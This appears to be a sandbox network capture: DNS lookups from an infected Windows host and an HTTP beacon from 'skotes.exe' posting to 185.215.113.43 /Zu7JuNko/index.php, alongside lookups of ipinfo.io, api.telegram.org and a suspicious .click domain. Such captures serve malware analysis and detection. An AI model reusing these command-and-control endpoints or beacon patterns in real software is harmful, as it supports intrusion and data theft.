Dec 12, 2024 16:50:27.680269003 CET	192.168.2.10	1.1.1.1	0x52f6	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 12, 2024 16:50:28.009838104 CET	192.168.2.10	1.1.1.1	0x49a4	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.010020018 CET	192.168.2.10	1.1.1.1	0x903f	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.010159016 CET	192.168.2.10	1.1.1.1	0x1edf	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.209633112 CET	192.168.2.10	1.1.1.1	0x256	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.339884043 CET	192.168.2.10	1.1.1.1	0x1edf	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.340166092 CET	192.168.2.10	1.1.1.1	0x39b	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.393999100 CET	192.168.2.10	1.1.1.1	0x9c15	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.403423071 CET	192.168.2.10	1.1.1.1	0xccf4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.403541088 CET	192.168.2.10	1.1.1.1	0x526	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:28.490530968 CET	192.168.2.10	1.1.1.1	0x4b41	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Dec 12, 2024 16:50:28.563685894 CET	192.168.2.10	1.1.1.1	0x1614	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 12, 2024 16:50:28.574942112 CET	192.168.2.10	1.1.1.1	0x9545	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 12, 2024 16:50:41.886501074 CET	192.168.2.10	1.1.1.1	0x1a0e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:41.886626005 CET	192.168.2.10	1.1.1.1	0x7e78	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 12, 2024 16:50:43.794709921 CET	192.168.2.10	1.1.1.1	0xfa1a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:43.948913097 CET	192.168.2.10	1.1.1.1	0xd708	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:44.163124084 CET	192.168.2.10	1.1.1.1	0x4177	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:44.340660095 CET	192.168.2.10	1.1.1.1	0xe522	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.643024921 CET	192.168.2.10	1.1.1.1	0xb733	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.671153069 CET	192.168.2.10	1.1.1.1	0x926	Standard query (0)	normandy.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.820432901 CET	192.168.2.10	1.1.1.1	0x9a61	Standard query (0)	normandy-cdn.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.914011002 CET	192.168.2.10	1.1.1.1	0xb0b7	Standard query (0)	services.addons.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.055341005 CET	192.168.2.10	1.1.1.1	0xfbef	Standard query (0)	normandy-cdn.services.mozilla.com	28	IN (0x0001)	false
Dec 12, 2024 16:50:51.057015896 CET	192.168.2.10	1.1.1.1	0x9f81	Standard query (0)	services.addons.mozilla.org	28	IN (0x0001)	false
Dec 12, 2024 16:50:51.859457016 CET	192.168.2.10	1.1.1.1	0x2816	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:56.873900890 CET	192.168.2.10	1.1.1.1	0x656a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:56.874048948 CET	192.168.2.10	1.1.1.1	0x9b6d	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 16:48:15.387427092 CET	1.1.1.1	192.168.2.10	0x9ea5	No error (0)	drive.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:48:18.164927959 CET	1.1.1.1	192.168.2.10	0x1137	No error (0)	drive.usercontent.google.com		172.217.17.65	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:48:24.313886881 CET	1.1.1.1	192.168.2.10	0x2ad9	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:48:26.431003094 CET	1.1.1.1	192.168.2.10	0x6d06	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:06.288402081 CET	1.1.1.1	192.168.2.10	0x3d53	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:06.535810947 CET	1.1.1.1	192.168.2.10	0x7eef	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.083506107 CET	1.1.1.1	192.168.2.10	0xea50	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.084182024 CET	1.1.1.1	192.168.2.10	0x398	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:49:07.084182024 CET	1.1.1.1	192.168.2.10	0x398	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.319448948 CET	1.1.1.1	192.168.2.10	0x7e15	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.319999933 CET	1.1.1.1	192.168.2.10	0x8145	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:07.472101927 CET	1.1.1.1	192.168.2.10	0xec6b	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 12, 2024 16:49:07.472845078 CET	1.1.1.1	192.168.2.10	0xcd28	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 12, 2024 16:49:25.587150097 CET	1.1.1.1	192.168.2.10	0x7f0b	No error (0)	www.google.com		142.250.181.36	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:25.587173939 CET	1.1.1.1	192.168.2.10	0x17dc	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 16:49:41.739701986 CET	1.1.1.1	192.168.2.10	0x67f6	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:42.477869987 CET	1.1.1.1	192.168.2.10	0x549e	No error (0)	youtube.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:42.857392073 CET	1.1.1.1	192.168.2.10	0x18d8	No error (0)	youtube.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:44.208827019 CET	1.1.1.1	192.168.2.10	0x3248	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:49:44.208827019 CET	1.1.1.1	192.168.2.10	0x3248	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:49:44.357681036 CET	1.1.1.1	192.168.2.10	0xe2db	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 16:49:44.357765913 CET	1.1.1.1	192.168.2.10	0x61cc	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:04.867202997 CET	1.1.1.1	192.168.2.10	0x37a5	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:04.868273973 CET	1.1.1.1	192.168.2.10	0x303d	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:06.111891985 CET	1.1.1.1	192.168.2.10	0xc866	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:06.111891985 CET	1.1.1.1	192.168.2.10	0xc866	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:06.131076097 CET	1.1.1.1	192.168.2.10	0x8451	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:08.833389044 CET	1.1.1.1	192.168.2.10	0xf659	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:08.833610058 CET	1.1.1.1	192.168.2.10	0xfee7	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:09.817677021 CET	1.1.1.1	192.168.2.10	0xc036	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 12, 2024 16:50:09.817697048 CET	1.1.1.1	192.168.2.10	0x31a5	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.817697048 CET	1.1.1.1	192.168.2.10	0x31a5	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.817718029 CET	1.1.1.1	192.168.2.10	0x487b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 12, 2024 16:50:09.817728043 CET	1.1.1.1	192.168.2.10	0x5223	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.817728043 CET	1.1.1.1	192.168.2.10	0x5223	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.880990028 CET	1.1.1.1	192.168.2.10	0x1b1d	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Dec 12, 2024 16:50:09.881288052 CET	1.1.1.1	192.168.2.10	0x6eb4	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:09.881288052 CET	1.1.1.1	192.168.2.10	0x6eb4	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:14.365437984 CET	1.1.1.1	192.168.2.10	0xc78a	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 16:50:14.365674973 CET	1.1.1.1	192.168.2.10	0xb8f7	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:23.056003094 CET	1.1.1.1	192.168.2.10	0xca8f	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:23.056003094 CET	1.1.1.1	192.168.2.10	0xca8f	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:26.990478992 CET	1.1.1.1	192.168.2.10	0xa358	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:26.990478992 CET	1.1.1.1	192.168.2.10	0xa358	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:26.990478992 CET	1.1.1.1	192.168.2.10	0xa358	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.223392010 CET	1.1.1.1	192.168.2.10	0x809f	No error (0)	fightlsoser.click		172.67.213.48	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.223392010 CET	1.1.1.1	192.168.2.10	0x809f	No error (0)	fightlsoser.click		104.21.35.43	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238122940 CET	1.1.1.1	192.168.2.10	0xd87d	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238204002 CET	1.1.1.1	192.168.2.10	0x2e18	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:27.238204002 CET	1.1.1.1	192.168.2.10	0x2e18	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.268258095 CET	1.1.1.1	192.168.2.10	0x809f	No error (0)	fightlsoser.click		104.21.35.43	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.268258095 CET	1.1.1.1	192.168.2.10	0x809f	No error (0)	fightlsoser.click		172.67.213.48	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.373162985 CET	1.1.1.1	192.168.2.10	0x28cd	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424344063 CET	1.1.1.1	192.168.2.10	0x20de	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.424920082 CET	1.1.1.1	192.168.2.10	0x9136	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.431107044 CET	1.1.1.1	192.168.2.10	0x28cd	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:27.817603111 CET	1.1.1.1	192.168.2.10	0x26b	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 12, 2024 16:50:27.818133116 CET	1.1.1.1	192.168.2.10	0x52f6	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 12, 2024 16:50:27.818133116 CET	1.1.1.1	192.168.2.10	0x52f6	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 12, 2024 16:50:27.818133116 CET	1.1.1.1	192.168.2.10	0x52f6	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 12, 2024 16:50:27.818133116 CET	1.1.1.1	192.168.2.10	0x52f6	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 12, 2024 16:50:28.149194956 CET	1.1.1.1	192.168.2.10	0x1edf	No error (0)	twitter.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.149502039 CET	1.1.1.1	192.168.2.10	0x903f	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:28.149502039 CET	1.1.1.1	192.168.2.10	0x903f	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.149502039 CET	1.1.1.1	192.168.2.10	0x903f	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.149502039 CET	1.1.1.1	192.168.2.10	0x903f	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.149502039 CET	1.1.1.1	192.168.2.10	0x903f	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.246079922 CET	1.1.1.1	192.168.2.10	0x49a4	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:28.246079922 CET	1.1.1.1	192.168.2.10	0x49a4	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.409360886 CET	1.1.1.1	192.168.2.10	0x256	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.409360886 CET	1.1.1.1	192.168.2.10	0x256	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.409360886 CET	1.1.1.1	192.168.2.10	0x256	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.409360886 CET	1.1.1.1	192.168.2.10	0x256	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.478511095 CET	1.1.1.1	192.168.2.10	0x1edf	No error (0)	twitter.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.531512022 CET	1.1.1.1	192.168.2.10	0x9c15	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.540656090 CET	1.1.1.1	192.168.2.10	0xccf4	No error (0)	www.google.com		142.250.181.36	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.540668964 CET	1.1.1.1	192.168.2.10	0x526	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 16:50:28.567709923 CET	1.1.1.1	192.168.2.10	0x39b	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:28.715786934 CET	1.1.1.1	192.168.2.10	0x9545	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 12, 2024 16:50:42.030308962 CET	1.1.1.1	192.168.2.10	0x7e78	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 12, 2024 16:50:42.030544043 CET	1.1.1.1	192.168.2.10	0x1a0e	No error (0)	www.google.com		142.250.181.36	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:43.933976889 CET	1.1.1.1	192.168.2.10	0xfa1a	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:43.933976889 CET	1.1.1.1	192.168.2.10	0xfa1a	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:44.088538885 CET	1.1.1.1	192.168.2.10	0xd708	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:44.088538885 CET	1.1.1.1	192.168.2.10	0xd708	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:44.300431013 CET	1.1.1.1	192.168.2.10	0x4177	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:44.300431013 CET	1.1.1.1	192.168.2.10	0x4177	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:44.480231047 CET	1.1.1.1	192.168.2.10	0xe522	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:44.480231047 CET	1.1.1.1	192.168.2.10	0xe522	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.808691025 CET	1.1.1.1	192.168.2.10	0x926	No error (0)	normandy.cdn.mozilla.net	normandy-cdn.services.mozilla.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:50.808691025 CET	1.1.1.1	192.168.2.10	0x926	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.878082991 CET	1.1.1.1	192.168.2.10	0xb733	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.878082991 CET	1.1.1.1	192.168.2.10	0xb733	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.878082991 CET	1.1.1.1	192.168.2.10	0xb733	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:50.878082991 CET	1.1.1.1	192.168.2.10	0xb733	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.033277988 CET	1.1.1.1	192.168.2.10	0x9a61	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.051851988 CET	1.1.1.1	192.168.2.10	0xb0b7	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.051851988 CET	1.1.1.1	192.168.2.10	0xb0b7	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.051851988 CET	1.1.1.1	192.168.2.10	0xb0b7	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.051851988 CET	1.1.1.1	192.168.2.10	0xb0b7	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:51.195625067 CET	1.1.1.1	192.168.2.10	0x9f81	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 12, 2024 16:50:51.195625067 CET	1.1.1.1	192.168.2.10	0x9f81	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 12, 2024 16:50:51.195625067 CET	1.1.1.1	192.168.2.10	0x9f81	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 12, 2024 16:50:51.195625067 CET	1.1.1.1	192.168.2.10	0x9f81	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 12, 2024 16:50:51.997504950 CET	1.1.1.1	192.168.2.10	0x2816	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:51.997504950 CET	1.1.1.1	192.168.2.10	0x2816	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:54.144243002 CET	1.1.1.1	192.168.2.10	0x78c	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:54.144243002 CET	1.1.1.1	192.168.2.10	0x78c	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:54.144251108 CET	1.1.1.1	192.168.2.10	0x78c	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:54.144251108 CET	1.1.1.1	192.168.2.10	0x78c	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:50:57.011554003 CET	1.1.1.1	192.168.2.10	0x656a	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:50:57.011687040 CET	1.1.1.1	192.168.2.10	0x9b6d	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49848	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:05.446523905 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:48:06.778474092 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49856	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
